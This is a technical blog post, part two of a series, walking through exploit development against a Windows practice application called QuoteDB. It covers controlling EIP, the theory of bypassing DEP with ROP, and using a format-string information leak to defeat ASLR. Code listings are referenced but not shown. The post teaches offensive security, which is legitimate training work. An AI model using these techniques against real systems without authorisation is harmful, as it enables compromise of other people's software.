Cybersecurity Consulting
February 21, 2024
20 minute read
Written by Nathan Golick, Senior Penetration Tester at DOT Security
[Editor’s Note: This is the second in a series of three guest posts that describe, in technical detail, the exploit development process on a 32-bit Windows Operating System. Part 1 covered how to crash the application.
Whether or not you’re a technical expert, you can get cybersecurity insights delivered directly to your inbox by subscribing to the DOT Security newsletter today.]
This blog will focus on the theory of overcoming various Windows mitigations: data execution prevention (DEP) through return-oriented programming (ROP) and address space layout randomization (ASLR) through information leakage.
It will also walk you through the steps required to find the information leak, how to turn it into a usable base address for the target application, and why this technique is important.
Before we dive into learning about Windows mitigations, some initial work needs to be done in the debugger to determine the offset required to overwrite the extended instruction pointer (EIP) with a specific value.
Later in this process, a memory address will be placed here to initiate the ROP chain, but for now, we need to figure out exactly how many bytes are needed to overflow the instruction pointer.
To accomplish this, two tools will be used:
msf-pattern_create is used to generate a cyclic pattern of a set size. This pattern will not repeat, so when it is fed into the application, the value in EIP can be used to determine its offset. This can be accomplished with the tool msf-pattern_offset. As its name implies, using the value retrieved from EIP, it will search the original pattern and output the location where it occurs.
Figure 01: Pattern create
The -l flag is used to specify the length of the pattern. In this case, 3000 bytes are generated and will be placed into the POC buffer with the variable name pattern. This pattern will be inserted into the buffer following the opcode.
Listing 01: POC with pattern
Re-run the exploit while the debugger is attached and running. This will cause a crash, note the value in the EIP register.
Figure 02: EIP value
Passing the value of EIP 37714336 into msf-pattern_offset produces the expected result of 2060 bytes as determined in the previous post.
Figure 03: Offset
Now we need to set up the buffer in our proof of concept exploit to verify the calculated offset values are correct. If we performed the previous steps correctly, it should be possible to place any arbitrary DWORD into EIP. The buffer will be set up as follows:
Listing 02: Buffer setup
With this setup, EIP is expected to contain 42424242, 42 is the hexadecimal representation of B. Note 3000 is arbitrary here, it was chosen to ensure there is ample space for shellcode to be placed after the overwrite.
Listing 03: Updated buffer
Re-running the updated exploit produces the expected result, with 42424242 being placed in EIP.
Figure 04: EIP overwrite
Now that we have gained control over the instruction pointer, it's time to learn about some of the mitigations the Windows OS has placed in our way.
If you are familiar with a standard stack-based buffer overflow, this would be the point to place some shellcode into the buffer and overwrite EIP with a jmp esp instruction. However, we are leveling up our skills and must contend with data execution prevention and address space layout randomization, which will be discussed in the next section.
Data execution prevention (DEP) was created to stop the traditional attack vector by changing the permissions of the stack to be non-executable. This means that even if we place shellcode onto the stack and jump to it, the application doesn’t have permission to run it as code. The application will crash with an access violation.
Return-oriented programming (ROP) is a technique that involves chaining together several existing instructions in the target application to accomplish the task of calling a Windows API that can set or change memory permissions.
Recall that we currently have the ability to overwrite EIP with an arbitrary value. Well, if we place several memory addresses onto the stack, and each of these addresses point to existing opcodes that end with a ret instruction, the application will happily jump to each address in order. Recall that when the application encounters a ret, it pops the next value off of the stack and continues execution from there.
These small chunks of code are referred to as gadgets. Each gadget individually may only move a value into a register or write a value to the stack, but collectively, they can set up an API call that sets a memory region as executable and can jump into that area. ROP chains are very powerful and their functionality is only limited by the opcodes available in the target application (and bad bytes in memory addresses).
One way to bypass DEP with ROP is to change the memory permissions of a specific region with the Windows API VirtualAlloc. Per the Windows documentation, VirtualAlloc “reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process.” VirtualProtect or WriteProcessMemory are also viable options, but for this walkthrough, we will stick with VirtualAlloc.
This sounds like a solid plan, to use ROP to change the memory permissions of the shellcode region to allow for execution. Simple right? Well, not quite. Successfully chaining together ROP gadgets relies on the memory addresses we use always being the same and pointing to the same assembly instructions.
Operating system designers recognized this and began working on another mitigation to randomize memory addresses at runtime.
At a high level, address space layout randomization (ASLR) randomizes the base address of an EXE or DLL in memory each time the application starts. This means that a carefully constructed ROP chain would be rendered useless, as none of the memory addresses point to the right assembly instructions anymore.
There are four main options to bypass ASLR:
While these techniques may offer varying degrees of success, we will be focusing on exploiting an information leak for this walkthrough.
If we can find another bug in the target application that reliably leaks memory addresses and we can return that information to our attacking system, it would allow us to calculate base addresses and run time. So, no matter what the base address is randomized to, we would be able to retrieve this address and feed it into our ROP chain. This would fix the problem presented with hardcoding memory addresses into the chain.
With a lot of theory out of the way, let's dive back into Ida and see if we can find an information leak.
Before we begin looking for an exploitable information leak, we need to understand how the application can send data back to the attacker machine. Recall the application has a few different functions. These include:
The get_quote function sounds like a reasonable place to start our analysis.
The get_quote function can be accessed with case 901 or opcode 0x385. This block can be found at QuoteDB + 0x187F. Jump to this location in Ida, it should look like Figure 05.
Figure 05: Case 901
This block loads the address of the beginning of the buffer into EAX. Then increments the address by 4, pointing to the next value in our buffer, and stores this value in var_803C. Then a bounds check occurs between the second value in the input buffer and the number of quotes in the database. If the second buffer value is below the total number of quotes, the bound check will be passed. The program here is checking that we are asking for a quote index that exists in its database.
Let's verify these assertions with dynamic analysis. Listing 04 shows the updated buffer contents in the POC.
Listing 04: get_quote buffer setup
Set a breakpoint at QuoteDB + 0x1888 in WinDbg and send the updated buffer. As expected, the second buffer value is dereferenced and placed into EAX.
Figure 06: Quote index
Continuing execution to QuoteDB + 0x1896, the variable Ida called _num_quotes is moved into EDX. We can verify this value is 0x0a which is 10 in decimal.
Figure 07: Number of quotes
If you would like to verify this is an accurate count (assuming no additional quotes have been added yet), navigate back to the main function, and enter the _start_server function. This is where the application initially populates the database with quotes, and there are indeed 10 of them.
Figure 08: Quote database initialization
Getting back to the task at hand, moving execution forward to the cmp statement, we can see that our value of 0x01 is indeed below the number of quotes 0x0a, and execution flows to the next code block which contains our target function call get_quote.
Figure 09: Taking the jb jump
With execution moving to the next block, we see a malloc call, then the call to our target function get_quote, and finally a memcpy call. malloc is used to allocate a chunk of memory, in this case 0x800 bytes, and returns a pointer to that memory chunk in EAX. This pointer is stored in the Src variable and then saved to the stack.
Note the quote_index variable is also placed on the stack before the get_quote call. This indicates a blank memory region and our quote_index are the parameters to the get_quote function call.
Figure 10: get_quote block
Immediately after the get_quote function, the value in EAX is stored in the Size variable. This indicates the return value from get_quote is the length of the quote.
Listing 05 provides the prototype of the memcpy function. This function copies data from the location pointed to by src to the location pointed to by dest, for a total of count bytes.
Listing 05: memcpy function prototype
The Src variable, which was just an empty allocated memory chunk, is now being used as the source for the memcpy call. Presumably, it holds the quote from get_quote; we will verify this with dynamic analysis shorty.
Finally, var_8034 is placed on the top of the stack which is the destination address for the memcpy. Keep this variable in mind, it will be important later.
A high-level overview of this code block:
malloc: allocate a chunk of memory
get_quote: retrieve a quote -> save quote to allocated memory, return length of quote
memcpy: copy the quote from allocated region to var_8034
Listing 06: Code block overview
Now that we have a better understanding of the code surrounding get_quote it is time to dig into the function itself and uncover another bug in the application.
Figure 11: get_quote function
There is a lot going on in this function, but I have added some comments to clarify some of the surrounding instructions.
After setting up a print to console with the quote number, the application takes the index value and performs a shl operation. This is a bitwise shift left, which essentially shifts the value of the first operand by the value of the second operand.
In this case, the index, which is 0x01, is shifted left by 0x0b or 11 in decimal. This results in 0x800 being placed in EAX. This operation is performed to calculate the offset into the quotes database, as each quote is allocated 0x800 bytes. So index 2 would equal 0x1000, which would be the third quote in the database; recall the index starts at 0.
Let's get WinDbg caught up to this location in Ida and verify our assertions. Set a breakpoint at QuoteDB + 0x158E and run the POC. This instruction will load our quote_index into EAX as expected.
Figure 12: Loading quote_index into EAX
Single step over the shl instruction and note the value in EAX.
Figure 13: Index left shift
As expected, EAX contains 0x800 and it is used in the next instruction, lea, which loads the effective address of the second operand into the first. Essentially, retrieving the address of the desired quote and placing it in EDX in this case.
The next few instructions I want to explore are the setup and call to snprintf. snprintf writes formatted data to a string. We will first understand how it works, then take a brief detour into format strings, and finally see if we can understand how this function could be abused to bypass ASLR.
We bring execution in WinDbg to QuoteDB + 0x159F and verify EDX contains the quote by using da to display the ASCII representation of the data at that memory address.
Figure 14: Quote in EDX
This address is written to the stack and is referenced in Figure 11 as Format in the second red box. Then a hardcoded BufferCount is written to the stack, and finally, the memory address of the memory region created by malloc is written to the stack.
Listing 07: snprintf function prototype
Listing 07 shows the snprintf function prototype. I have moved execution to QuoteDB + 0x15AE which is just prior to the snprintf call using dds to dump the stack, and have labeled the parameters.
Figure 15: snprintf arguments
With this setup, we would expect the quote that is stored in format to be printed to the memory address buffer with a max number of bytes to be counted. Step over the call and verify this by dumping the buffer address as DWORDs and as ASCII.
Figure 16: snprintf results
The function completed successfully and snprintf wrote the quote to the memory address as expected.
This code block will then get the length of the quote with the strlen function and return to the previous block. Here it performs a memcpy from the Src variable, which is the quote, to the variable var_8034. The size of the copy is the length of the quote.
Two code blocks lower, we see a send function and the variable var_8034 is being placed onto the stack as a buffer. This looks like the quote we specified will be sent back to the attacking machine.
Figure 17: Send function
Let's verify this by updating our POC a bit to allow the server to send data back to us, and print it to the console.
Listing 08: Updated POC code to handle response
Let’s verify this is working by closing WinDbg, restarting the application, and sending the exploit POC. Note I manually changed the quote index in the POC between runs to print various quotes.
Figure 18: Server responses
How is retrieving quotes from the database supposed to help us bypass ASLR? Let’s take a quick detour into what format strings are with a code example.
Listing 09: C format string example
Hex: ff, Integer: 255
Listing 10: Format String output
Listing 09 shows an example function call of snprintf that includes the string "Hex: %x, Integer: %i" but there are also some percent signs followed by characters. These are called format specifiers and there are several to choose from.
Their purpose is to translate data into a specific format; this can be floating-point values, integers, hex values, pointers, etc. In this example, the value number that initially holds 255 is formatted into a hex value and an integer value using %x and %i respectively.
Listing 10 shows the output if this example was to be compiled and executed. Note the variable number is never changed to hold the value ff, but with the power of format specifiers and snprintf, the output buffer contains the representation of 255 in hexadecimal.
Now that we know a bit about how format strings work, let's do a little thought experiment. What would happen if we tried to print "Hex: %x, Integer: %i" but didn’t include any variables for it to format? Recall that these are optional parameters, so the function will still succeed.
Listing 11: Hypothetical snprintf call
This function call would begin to write arbitrary data as it pulls whatever is on the stack and attempts to format it.
Let's take this thought experiment one step further, what would happen if the function call looked like this?
Listing 12: Second hypothetical snprintf call
This is twenty hexadecimal format specifiers without any values for the function to format. In theory, this would grab twenty addresses off the stack and place them into the buffer variable.
These stack values could contain any arbitrary data, but it may also contain memory addresses that reside in a target application. If we can leak an address from the QuoteDB module itself and mask off the lower 2 bytes, we have just obtained the base address of the application.
This allows us to bypass ASLR because, no matter what the base address of the application is randomized to at runtime, we can leak a memory address and calculate the base address from it.
With a base address, we can return to our DEP bypass technique of return-oriented programming and build a ROP chain based on the base address of the module and some offset.
It is important to understand that, while the base address of each application is randomized, the offset to every instruction within that application remains the same.
So, with a hypothetical ASLR bypass in hand, how do we prove this theory? We need to control the buffer that is passed to the snprintf function and input our string of %x’s. Luckily, this application has another function called add_quote that should allow us to do just that.
Repeating the reverse engineering process as discussed for previous functions, we learn that it's possible to add quotes to the database by passing the string in as part of the buffer. In our case, we want to pass in format specifiers.
The exploit POC code has been updated to reflect the required buffer to add a quote that contains a string of hexadecimal format specifiers. I have also segmented the different application operations into functions to make the final exploit more readable.
Listing 13: add_quote function to set up ASLR bypass
Listing 14 is the full exploit POC so far. It is able to interact with the application to add a quote of format specifiers and read that quote back, exploiting the snprintf call without any optional parameters. This results in values already on the stack being placed in the destination buffer and sent back to the user.
Listing 14: POC so far, adds a quote and leaks stack addresses
Running this POC without the debugger attached should result in output that looks something like Figure 19.
Figure 19: Stack leaks
While this may look like a jumbled mess of output, let's take a look under the debugger and see how this actually works.
Let's once again open the application and attach WinDbg. Set a breakpoint at QuoteDB + 0x15AE, which is the call to snprintf, run the exploit, and dump the stack to examine the function call parameters.
Figure 20: Stack setup for function call
Figure 20 shows how the stack is set up just prior to the snprintf function call. There are three parameters as expected for the destination buffer, size, and format string. However, now the format string contains format specifiers, as shown in Figure 21.
Figure 21: Format specifiers
Because no parameters have been supplied to be formatted by the snprintf function, we would expect it to assume the values on the stack were intended to be used as these parameters.
Step over the function call and dump the destination buffer as ASCII with da.
Figure 22: Information leak of stack addresses
This buffer now contains the “unrelated stack data” from Figure 20. Let execution continue with g in WinDbg and check the terminal for a server response.
Figure 23: Server response
Now that we are able to leak arbitrary data from the stack at runtime, all that is left is to parse out the data we want and subtract the offset to turn it into the application’s base address.
With our ultimate goal of creating a ROP chain in mind to bypass DEP, we must choose a module to create gadgets from. For this walkthrough, the QuoteDB application itself will be chosen.
If a module is chosen that is not packaged with the target application, such as a native Windows DLL, this can reduce the portability of the exploit as these files can change between Windows versions and break the ROP chain.
Notice in Figure 20 there are two addresses that reside in the QuoteDB application.
00fb173b QuoteDB+0x173b 00fb18fb QuoteDB+0x18fb
Listing 15: QuoteDB addresses on the stack
Either of them can be used to calculate the base address of the application itself and there are several ways to do this.
Below is the way I choose to do it with the first address. First, decoding the server response as ASCII, then subtracting the offset (0x173b), and finally printing the base address as hexadecimal.
Listing 16: Parsing code in POC
This results in the following output from the POC:
Figure 24: QuoteDB base address
We can verify this in WinDbg with the lm command, which will list all modules.
Figure 25: Loaded modules
These addresses match! We now have the ability to bypass ASLR and can resolve any address in the target application. This will be necessary in the next part of the walkthrough where we will create a ROP Chain to bypass DEP and gain code execution on the target server.
The final post in this series will be published on Wednesday, February 28th. To make sure you never miss a thing from the DOT Security Insights hub, subscribe to our newsletter today.
Nathan is a day-one employee of DOT Security, working with the team for over three years and performing network penetration tests since before DOT Security officially spun off Impact Networking. He provides clients with an in-depth look at their environment from an attacker’s point of view, sharing actionable advice to secure their networks from the ever-present threat of bad actors. Nathan specializes in facets of offensive security like Active Directory penetration testing, malware development, binary exploitation, and AV/EDR evasion. In his free time, Nathan is an avid golfer, likes playing flight simulators, and enjoys learning new techniques to further his skillset as a penetration tester.